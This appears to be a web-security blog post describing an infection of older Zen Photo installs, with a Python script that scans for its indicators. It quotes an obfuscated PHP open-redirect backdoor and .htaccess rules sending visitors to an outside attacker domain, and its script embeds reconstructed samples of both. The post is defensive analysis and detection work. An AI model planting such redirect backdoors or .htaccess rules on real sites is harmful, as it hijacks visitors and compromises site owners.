New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we are finding new variants of the infection.

We have been seeing a dropped file named thumbsdata.php. It usually contains a string of obfuscated code like this (the numeric array is a list of character codes that the script turns back into a string, and the tail of the file redirects the visitor to whatever URL is supplied in the l parameter):

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET["l"]; } @header("Location: $l"); exit; }

It is accompanied by an .htaccess file in the same folder with lines similar to these:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We have seen other domains used as well; this is just one example. The effect of these directives is that any request that produces one of the listed error codes, and, because the RewriteRule pattern is negated with !, any request other than one for thumbsdata.php itself, is redirected to the attacker's site, with the original host and path passed along in the r parameter.

In the log files we are seeing strings sent to the c.php file in the root of the Zen Photo installation. That file handles the captcha, but apparently does not sanitize the data it receives.

Again, this affects older versions of Zen Photo.
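As an added example (this is not code from the original post or from the Zen Photo project), the script below checks an install for the indicators described above and in the log section: a dropped thumbsdata.php, .htaccess ErrorDocument or RewriteRule directives that send visitors to an outside host, character-code arrays hidden in PHP files (decoded so you can see what they spell), and access-log requests that deliver parameters to c.php. The sample files, the log lines, the attacker.example domain and the gallery.example.com host name are all constructed for the demo; point scan_webroot at a real web root and your own host names to use it for real.

```python
import os
import re
import tempfile

# Constructed sample .htaccess, modelled on the directives quoted in the post.
SAMPLE_HTACCESS = """ErrorDocument 403 http://attacker.example/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://attacker.example/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://attacker.example/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
"""
# Constructed sample dropped file: a string built from character codes plus the open redirect.
SAMPLE_BACKDOOR = """<?php
$vf=substr(1,1);$s='';foreach(array(10,100,111,99,117,109,101,110,116) as $c){$s.=chr($c);}
if(isset($_GET["l"])){ $l=$_GET["l"]; } @header("Location: $l"); exit;
"""
# Constructed access-log lines; only the last two carry input to c.php.
SAMPLE_LOG = """203.0.113.5 - - [10/Mar/2013:04:12:01 +0000] "GET /gallery/index.php?album=cats HTTP/1.1" 200 8041
203.0.113.5 - - [10/Mar/2013:04:12:09 +0000] "GET /gallery/c.php HTTP/1.1" 200 1207
198.51.100.7 - - [10/Mar/2013:04:13:44 +0000] "GET /gallery/c.php?v=%27%22%3C HTTP/1.1" 200 312
198.51.100.7 - - [10/Mar/2013:04:13:45 +0000] "POST /gallery/c.php HTTP/1.1" 200 44
"""

# array(10,100,111,...) style lists of at least four byte values.
CHR_ARRAY_RE = re.compile(r"array\(\s*((?:\d{1,3}\s*,\s*){3,}\d{1,3})\s*\)")
# ErrorDocument or RewriteRule whose target is an absolute http(s) URL.
HTACCESS_REDIRECT_RE = re.compile(r"^\s*(ErrorDocument\s+\d{3}|RewriteRule\s+\S+)\s+(https?://\S+)", re.M)
# Method, path and optional query string from a combined-format log line.
LOG_RE = re.compile(r'"(GET|POST)\s+(/[^?\s"]*)(\?[^\s"]*)?\s+HTTP/')


def decode_chr_arrays(php_source):
    """Return the strings hidden in numeric arrays, skipping binary junk."""
    found = []
    for m in CHR_ARRAY_RE.finditer(php_source):
        values = [int(v) for v in m.group(1).split(",")]
        if all(v < 256 for v in values):
            text = bytes(values).decode("latin-1")
            if all(ch.isprintable() or ch in "\n\r\t" for ch in text):
                found.append(text)
    return found


def htaccess_redirects(text, own_hosts):
    """Return (directive, url) pairs whose target host is not one of own_hosts."""
    hits = []
    for m in HTACCESS_REDIRECT_RE.finditer(text):
        host = re.match(r"https?://([^/:?#]+)", m.group(2)).group(1).lower()
        if host not in own_hosts:
            hits.append((m.group(1), m.group(2)))
    return hits


def scan_webroot(root, own_hosts):
    """Walk an install and report (finding, path) pairs for the indicators in the post."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == "thumbsdata.php":
                findings.append(("dropped file", path))
            if name == ".htaccess":
                with open(path, encoding="latin-1") as fh:
                    for directive, _url in htaccess_redirects(fh.read(), own_hosts):
                        findings.append(("external redirect: " + directive, path))
            if name.endswith(".php"):
                with open(path, encoding="latin-1") as fh:
                    for hidden in decode_chr_arrays(fh.read()):
                        findings.append(("chr() array decodes to %r" % hidden, path))
    return findings


def suspicious_captcha_requests(log_lines):
    """Requests that hand parameters (query string or POST body) to c.php."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m.group(2).endswith("/c.php") and (m.group(1) == "POST" or m.group(3)):
            hits.append(line)
    return hits


def build_sample_site(root):
    """Write the constructed sample files into root (demo only)."""
    for name, body in (("thumbsdata.php", SAMPLE_BACKDOOR), (".htaccess", SAMPLE_HTACCESS),
                       ("c.php", "<?php // stand-in for the real captcha script\n")):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)


def run_demo():
    """Scan a throwaway copy of the sample site; returns (file findings, log hits)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        findings = scan_webroot(root, {"gallery.example.com"})
    return findings, suspicious_captcha_requests(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    file_findings, log_hits = run_demo()
    for what, where in file_findings:
        print("%-45s %s" % (what, os.path.basename(where)))
    for line in log_hits:
        print("c.php input:", line)
```

The decoder is deliberately loose: any array of four or more byte values is decoded, and only results that are printable text are reported, so legitimate numeric arrays drop out. The log filter treats every request that supplies input to c.php as worth a look rather than matching a particular payload, since the post does not say what the strings contained.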

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.